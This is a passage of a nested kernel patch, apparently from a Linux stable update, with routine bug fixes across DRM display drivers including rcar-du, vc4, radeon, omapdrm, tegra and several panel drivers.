+ 		}
+ 		submit->cmd[i].relocs = kmalloc(sz, GFP_KERNEL);
++		if (!submit->cmd[i].relocs) {
++			ret = -ENOMEM;
++			goto out;
++		}
+ 		ret = copy_from_user(submit->cmd[i].relocs, userptr, sz);
+ 		if (ret) {
+ 			ret = -EFAULT;
+diff --git a/drivers/gpu/drm/mxsfb/Kconfig b/drivers/gpu/drm/mxsfb/Kconfig
+index 116f8168bda4a..518b533453548 100644
+--- a/drivers/gpu/drm/mxsfb/Kconfig
++++ b/drivers/gpu/drm/mxsfb/Kconfig
+@@ -8,6 +8,7 @@ config DRM_MXSFB
+ 	tristate "i.MX (e)LCDIF LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXS || ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+@@ -24,6 +25,7 @@ config DRM_IMX_LCDIF
+ 	tristate "i.MX LCDIFv3 LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+diff --git a/drivers/gpu/drm/nouveau/include/nvif/outp.h b/drivers/gpu/drm/nouveau/include/nvif/outp.h
+index 45daadec3c0c7..fa76a7b5e4b37 100644
+--- a/drivers/gpu/drm/nouveau/include/nvif/outp.h
++++ b/drivers/gpu/drm/nouveau/include/nvif/outp.h
+@@ -3,6 +3,7 @@
+ #define __NVIF_OUTP_H__
+ #include <nvif/object.h>
+ #include <nvif/if0012.h>
++#include <drm/display/drm_dp.h>
+ struct nvif_disp;
+ 
+ struct nvif_outp {
+@@ -21,7 +22,7 @@ int nvif_outp_acquire_rgb_crt(struct nvif_outp *);
+ int nvif_outp_acquire_tmds(struct nvif_outp *, int head,
+ 			   bool hdmi, u8 max_ac_packet, u8 rekey, u8 scdc, bool hda);
+ int nvif_outp_acquire_lvds(struct nvif_outp *, bool dual, bool bpc8);
+-int nvif_outp_acquire_dp(struct nvif_outp *, u8 dpcd[16],
++int nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[DP_RECEIVER_CAP_SIZE],
+ 			 int link_nr, int link_bw, bool hda, bool mst);
+ void nvif_outp_release(struct nvif_outp *);
+ int nvif_outp_infoframe(struct nvif_outp *, u8 type, struct nvif_outp_infoframe_v0 *, u32 size);
+diff --git a/drivers/gpu/drm/nouveau/nvif/outp.c b/drivers/gpu/drm/nouveau/nvif/outp.c
+index 7da39f1eae9fb..c24bc5eae3ecf 100644
+--- a/drivers/gpu/drm/nouveau/nvif/outp.c
++++ b/drivers/gpu/drm/nouveau/nvif/outp.c
+@@ -127,7 +127,7 @@ nvif_outp_acquire(struct nvif_outp *outp, u8 proto, struct nvif_outp_acquire_v0
+ }
+ 
+ int
+-nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[16],
++nvif_outp_acquire_dp(struct nvif_outp *outp, u8 dpcd[DP_RECEIVER_CAP_SIZE],
+ 		     int link_nr, int link_bw, bool hda, bool mst)
+ {
+ 	struct nvif_outp_acquire_v0 args;
+diff --git a/drivers/gpu/drm/omapdrm/dss/dsi.c b/drivers/gpu/drm/omapdrm/dss/dsi.c
+index a6845856cbce4..4c1084eb01759 100644
+--- a/drivers/gpu/drm/omapdrm/dss/dsi.c
++++ b/drivers/gpu/drm/omapdrm/dss/dsi.c
+@@ -1039,22 +1039,26 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ {
+ 	struct dsi_data *dsi = s->private;
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kmalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats)
++		return -ENOMEM;
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1]);
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1078,10 +1082,10 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1097,7 +1101,7 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
+ 	PIS(ERRSYNCESC1);
+@@ -1122,6 +1126,8 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
+ 
++	kfree(stats);
++
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 5cb8dc2ebe184..ef70928c3ccbc 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -1891,7 +1891,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('C', 'M', 'N', 0x1247, &delay_200_500_e80_d50, "N120ACA-EA1"),
+ 
+ 	EDP_PANEL_ENTRY('I', 'V', 'O', 0x057d, &delay_200_500_e200, "R140NWF5 RH"),
+-	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "M133NW4J-R3"),
++	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "R133NW4K-R0"),
+ 
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x0624, &kingdisplay_kd116n21_30nv_a010.delay, "116N21-30NV-A010"),
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x1120, &delay_200_500_e80_d50, "116N29-30NK-C007"),
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+index 5c621b15e84c2..439ef30735128 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+@@ -692,7 +692,9 @@ static int s6e3ha2_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS;
++	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS |
++		MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++		MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+index e06fd35de814b..9c3e76171759a 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+@@ -446,7 +446,8 @@ static int s6e63j0x03_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_MODE_NO_EOT_PACKET;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO_NO_HFP |
++		MIPI_DSI_MODE_VIDEO_NO_HBP | MIPI_DSI_MODE_VIDEO_NO_HSA;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+index 54213beafaf5e..ebf4c2d39ea88 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+@@ -990,8 +990,6 @@ static int s6e8aa0_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST
+-		| MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP
+-		| MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET
+ 		| MIPI_DSI_MODE_VSYNC_FLUSH | MIPI_DSI_MODE_VIDEO_AUTO_VERT;
+ 
+ 	ret = s6e8aa0_parse_dt(ctx);
+diff --git a/drivers/gpu/drm/radeon/atombios_encoders.c b/drivers/gpu/drm/radeon/atombios_encoders.c
+index c841c273222e7..3e24fa11d4d38 100644
+--- a/drivers/gpu/drm/radeon/atombios_encoders.c
++++ b/drivers/gpu/drm/radeon/atombios_encoders.c
+@@ -2122,11 +2122,12 @@ int radeon_atom_pick_dig_encoder(struct drm_encoder *encoder, int fe_idx)
+ 
+ 	/*
+ 	 * On DCE32 any encoder can drive any block so usually just use crtc id,
+-	 * but Apple thinks different at least on iMac10,1, so there use linkb,
++	 * but Apple thinks different at least on iMac10,1 and iMac11,2, so there use linkb,
+ 	 * otherwise the internal eDP panel will stay dark.
+ 	 */
+ 	if (ASIC_IS_DCE32(rdev)) {
+-		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1"))
++		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1") ||
++		    dmi_match(DMI_PRODUCT_NAME, "iMac11,2"))
+ 			enc_idx = (dig->linkb) ? 1 : 0;
+ 		else
+ 			enc_idx = radeon_crtc->crtc_id;
+diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c
+index 6344454a77217..4f9729b4a8119 100644
+--- a/drivers/gpu/drm/radeon/radeon_device.c
++++ b/drivers/gpu/drm/radeon/radeon_device.c
+@@ -1023,6 +1023,7 @@ void radeon_atombios_fini(struct radeon_device *rdev)
+ {
+ 	if (rdev->mode_info.atom_context) {
+ 		kfree(rdev->mode_info.atom_context->scratch);
++		kfree(rdev->mode_info.atom_context->iio);
+ 	}
+ 	kfree(rdev->mode_info.atom_context);
+ 	rdev->mode_info.atom_context = NULL;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index 3619e1ddeb620..b7dd59fe119e6 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/mutex.h>
+ #include <linux/platform_device.h>
+-#include <linux/sys_soc.h>
+ 
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -204,11 +203,6 @@ static void rcar_du_escr_divider(struct clk *clk, unsigned long target,
+ 	}
+ }
+ 
+-static const struct soc_device_attribute rcar_du_r8a7795_es1[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+-	{ /* sentinel */ }
+-};
+-
+ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ {
+ 	const struct drm_display_mode *mode = &rcrtc->crtc.state->adjusted_mode;
+@@ -238,7 +232,7 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * no post-divider when a display PLL is present (as shown by
+ 		 * the workaround breaking HDMI output on M3-W during testing).
+ 		 */
+-		if (soc_device_match(rcar_du_r8a7795_es1)) {
++		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+ 			target *= 2;
+ 			div = 1;
+ 		}
+@@ -251,13 +245,30 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1)
++		if (rcrtc->index == 1) {
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		else
+-			dpllcr |= DPLLCR_PLCS0
++		} else {
++			dpllcr |= DPLLCR_PLCS0_PLL
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
++			/*
++			 * On ES2.x we have a single mux controlled via bit 21,
++			 * which selects between DCLKIN source (bit 21 = 0) and
++			 * a PLL source (bit 21 = 1), where the PLL is always
++			 * PLL1.
++			 *
++			 * On ES1.x we have an additional mux, controlled
++			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
++			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
++			 * so on ES1.x, in addition to setting bit 21, we need
++			 * to set the bit 20.
++			 */
++
++			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
++				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
++		}
++
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index d003e8d9e7a26..53c9669a3851c 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,6 +16,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
++#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -386,6 +387,43 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
++static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
++	.gen = 3,
++	.features = RCAR_DU_FEATURE_CRTC_IRQ
++		  | RCAR_DU_FEATURE_CRTC_CLOCK
++		  | RCAR_DU_FEATURE_VSP1_SOURCE
++		  | RCAR_DU_FEATURE_INTERLACED
++		  | RCAR_DU_FEATURE_TVM_SYNC,
++	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
++		| RCAR_DU_QUIRK_H3_ES1_PLL,
++	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
++	.routes = {
++		/*
++		 * R8A7795 has one RGB output, two HDMI outputs and one
++		 * LVDS output.
++		 */
++		[RCAR_DU_OUTPUT_DPAD0] = {
++			.possible_crtcs = BIT(3),
++			.port = 0,
++		},
++		[RCAR_DU_OUTPUT_HDMI0] = {
++			.possible_crtcs = BIT(1),
++			.port = 1,
++		},
++		[RCAR_DU_OUTPUT_HDMI1] = {
++			.possible_crtcs = BIT(2),
++			.port = 2,
++		},
++		[RCAR_DU_OUTPUT_LVDS0] = {
++			.possible_crtcs = BIT(0),
++			.port = 3,
++		},
++	},
++	.num_lvds = 1,
++	.num_rpf = 5,
++	.dpll_mask =  BIT(2) | BIT(1),
++};
++
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
+@@ -554,6 +592,11 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
++static const struct soc_device_attribute rcar_du_soc_table[] = {
++	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
++	{ /* sentinel */ }
++};
++
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -645,6 +688,7 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
++	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -659,8 +703,13 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 		return PTR_ERR(rcdu);
+ 
+ 	rcdu->dev = &pdev->dev;
++
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
++	soc_attr = soc_device_match(rcar_du_soc_table);
++	if (soc_attr)
++		rcdu->info = soc_attr->data;
++
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index 5cfa2bb7ad93d..acc3673fefe18 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,6 +34,8 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
++#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
++#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index c1bcb0e8b5b4e..789ae9285108e 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,12 +283,8 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-/*
+- * PLCS0 is bit 21, but H3 ES1.x requires bit 20 to be set as well. As bit 20
+- * isn't implemented by other SoC in the Gen3 family it can safely be set
+- * unconditionally.
+- */
+-#define DPLLCR_PLCS0		(3 << 20)
++#define DPLLCR_PLCS0_PLL	(1 << 21)
++#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/tegra/firewall.c b/drivers/gpu/drm/tegra/firewall.c
+index 1824d2db0e2ce..d53f890fa6893 100644
+--- a/drivers/gpu/drm/tegra/firewall.c
++++ b/drivers/gpu/drm/tegra/firewall.c
+@@ -97,6 +97,9 @@ static int fw_check_regs_imm(struct tegra_drm_firewall *fw, u32 offset)
+ {
+ 	bool is_addr;
+ 
++	if (!fw->client->ops->is_addr_reg)
++		return 0;
++
+ 	is_addr = fw->client->ops->is_addr_reg(fw->client->base.dev, fw->class,
+ 					       offset);
+ 	if (is_addr)
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index ad93acc9abd2a..16301bdfead12 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -1858,8 +1858,8 @@ static const struct {
+ 	{ DRM_FORMAT_XBGR4444, 0x21, },
+ 	{ DRM_FORMAT_RGBX4444, 0x22, },
+ 
+-	{ DRM_FORMAT_ARGB1555, 0x25, },
+-	{ DRM_FORMAT_ABGR1555, 0x26, },
++	{ DRM_FORMAT_XRGB1555, 0x25, },
++	{ DRM_FORMAT_XBGR1555, 0x26, },
+ 
+ 	{ DRM_FORMAT_XRGB8888, 0x27, },
+ 	{ DRM_FORMAT_XBGR8888, 0x28, },
+diff --git a/drivers/gpu/drm/tiny/ili9486.c b/drivers/gpu/drm/tiny/ili9486.c
+index 1bb847466b107..a63b15817f112 100644
+--- a/drivers/gpu/drm/tiny/ili9486.c
++++ b/drivers/gpu/drm/tiny/ili9486.c
+@@ -43,6 +43,7 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 			     size_t num)
+ {
+ 	struct spi_device *spi = mipi->spi;
++	unsigned int bpw = 8;
+ 	void *data = par;
+ 	u32 speed_hz;
+ 	int i, ret;
+@@ -56,8 +57,6 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 	 * The displays are Raspberry Pi HATs and connected to the 8-bit only
+ 	 * SPI controller, so 16-bit command and parameters need byte swapping
+ 	 * before being transferred as 8-bit on the big endian SPI bus.
+-	 * Pixel data bytes have already been swapped before this function is
+-	 * called.
+ 	 */
+ 	buf[0] = cpu_to_be16(*cmd);
+ 	gpiod_set_value_cansleep(mipi->dc, 0);
+@@ -71,12 +70,18 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 		for (i = 0; i < num; i++)
+ 			buf[i] = cpu_to_be16(par[i]);
+ 		num *= 2;
+-		speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
+ 		data = buf;
+ 	}
+ 
++	/*
++	 * Check whether pixel data bytes needs to be swapped or not
++	 */
++	if (*cmd == MIPI_DCS_WRITE_MEMORY_START && !mipi->swap_bytes)
++		bpw = 16;
++
+ 	gpiod_set_value_cansleep(mipi->dc, 1);
+-	ret = mipi_dbi_spi_transfer(spi, speed_hz, 8, data, num);
++	speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
++	ret = mipi_dbi_spi_transfer(spi, speed_hz, bpw, data, num);
+  free:
+ 	kfree(buf);
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_dpi.c b/drivers/gpu/drm/vc4/vc4_dpi.c
+index 1f8f44b7b5a5f..61ef7d232a12c 100644
+--- a/drivers/gpu/drm/vc4/vc4_dpi.c
++++ b/drivers/gpu/drm/vc4/vc4_dpi.c
+@@ -179,7 +179,7 @@ static void vc4_dpi_encoder_enable(struct drm_encoder *encoder)
+ 						       DPI_FORMAT);
+ 				break;
+ 			case MEDIA_BUS_FMT_RGB565_1X16:
+-				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_3,
++				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_1,
+ 						       DPI_FORMAT);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index 7546103f14997..3f3f94e7b8339 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -406,6 +406,7 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ {
+ 	struct drm_connector *connector = &vc4_hdmi->connector;
+ 	struct edid *edid;
++	int ret;
+ 
+ 	/*
+ 	 * NOTE: This function should really be called with
+@@ -434,7 +435,15 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	kfree(edid);
+ 
+-	vc4_hdmi_reset_link(connector, ctx);
++	for (;;) {
++		ret = vc4_hdmi_reset_link(connector, ctx);
++		if (ret == -EDEADLK) {
++			drm_modeset_backoff(ctx);
++			continue;
++		}
++
++		break;
++	}
+ }
+ 
+ static int vc4_hdmi_connector_detect_ctx(struct drm_connector *connector,
+@@ -1302,11 +1311,12 @@ static void vc5_hdmi_set_timings(struct vc4_hdmi *vc4_hdmi,
+ 		     VC4_SET_FIELD(mode->crtc_vdisplay, VC5_HDMI_VERTA_VAL));
+ 	u32 vertb = (VC4_SET_FIELD(mode->htotal >> (2 - pixel_rep),
+ 				   VC5_HDMI_VERTB_VSPO) |
+-		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end,
++		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end +
++				   interlaced,
+ 				   VC4_HDMI_VERTB_VBP));
+ 	u32 vertb_even = (VC4_SET_FIELD(0, VC5_HDMI_VERTB_VSPO) |
+ 			  VC4_SET_FIELD(mode->crtc_vtotal -
+-					mode->crtc_vsync_end - interlaced,
++					mode->crtc_vsync_end,
+ 					VC4_HDMI_VERTB_VBP));
+ 	unsigned long flags;
+ 	unsigned char gcp;
+diff --git a/drivers/gpu/drm/vc4/vc4_hvs.c b/drivers/gpu/drm/vc4/vc4_hvs.c
+index c4453a5ae163a..d9fc0d03023b0 100644
+--- a/drivers/gpu/drm/vc4/vc4_hvs.c
++++ b/drivers/gpu/drm/vc4/vc4_hvs.c
+@@ -370,28 +370,30 @@ static int vc4_hvs_init_channel(struct vc4_hvs *hvs, struct drm_crtc *crtc,
+ 	 * mode.
+ 	 */
+ 	dispctrl = SCALER_DISPCTRLX_ENABLE;
++	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 
+-	if (!vc4->is_vc5)
++	if (!vc4->is_vc5) {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER_DISPCTRLX_ONESHOT : 0);
+-	else
++		dispbkgndx |= SCALER_DISPBKGND_AUTOHS;
++	} else {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER5_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER5_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER5_DISPCTRLX_ONESHOT : 0);
++		dispbkgndx &= ~SCALER5_DISPBKGND_BCK2BCK;
++	}
+ 
+ 	HVS_WRITE(SCALER_DISPCTRLX(chan), dispctrl);
+ 
+-	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 	dispbkgndx &= ~SCALER_DISPBKGND_GAMMA;
+ 	dispbkgndx &= ~SCALER_DISPBKGND_INTERLACE;
+ 
+ 	HVS_WRITE(SCALER_DISPBKGNDX(chan), dispbkgndx |
+-		  SCALER_DISPBKGND_AUTOHS |
+ 		  ((!vc4->is_vc5) ? SCALER_DISPBKGND_GAMMA : 0) |
+ 		  (interlace ? SCALER_DISPBKGND_INTERLACE : 0));
+ 
+@@ -658,7 +660,8 @@ void vc4_hvs_mask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl &= ~SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl &= ~(hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					 SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+@@ -675,7 +678,8 @@ void vc4_hvs_unmask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl |= SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl |= (hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPSTAT,
+ 		  SCALER_DISPSTAT_EUFLOW(channel));
+@@ -701,6 +705,7 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	int channel;
+ 	u32 control;
+ 	u32 status;
++	u32 dspeislur;
+ 
+ 	/*
+ 	 * NOTE: We don't need to protect the register access using
+@@ -717,9 +722,11 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	control = HVS_READ(SCALER_DISPCTRL);
+ 
+ 	for (channel = 0; channel < SCALER_CHANNELS_COUNT; channel++) {
++		dspeislur = vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					  SCALER_DISPCTRL_DSPEISLUR(channel);
